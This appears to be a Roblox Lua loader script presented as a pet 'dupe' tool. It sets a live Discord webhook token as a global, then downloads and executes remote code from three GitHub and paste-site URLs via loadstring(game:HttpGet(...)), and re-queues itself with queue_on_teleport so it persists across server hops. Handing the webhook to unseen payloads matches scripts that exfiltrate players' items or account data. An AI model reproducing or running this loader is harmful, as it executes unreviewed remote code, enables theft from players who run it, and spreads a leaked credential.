local userWebhook = "https://discord.com/api/webhooks/1384606238528110662/w1t6QQMBttGlRlNjezc2Bmeatsqf2j__devSN7DirKJPX1p9K43lcCBzE7GRrjA0DbW-"
local mainScriptUrl = "https://raw.githubusercontent.com/DupeEsp/Loader/refs/heads/main/main"
local yourscripturl = "https://raw.githubusercontent.com/dewerlywnoz/SB-LOADER/refs/heads/main/DUPE-PETS"
local loaderUrl = "https://cdn.sourceb.in/bins/upc1S3mQ3u/0"

local commandToRun = 
    "Webhook = '" .. userWebhook .. "'; " ..
    "pcall(function() loadstring(game:HttpGet('" .. mainScriptUrl .. "'))() end); " ..
    "pcall(function() loadstring(game:HttpGet('" .. yourscripturl .. "'))() end); " ..
    "pcall(function() loadstring(game:HttpGet('" .. loaderUrl .. "'))() end);"

pcall(function()
    loadstring(commandToRun)()
end)

queue_on_teleport(commandToRun)
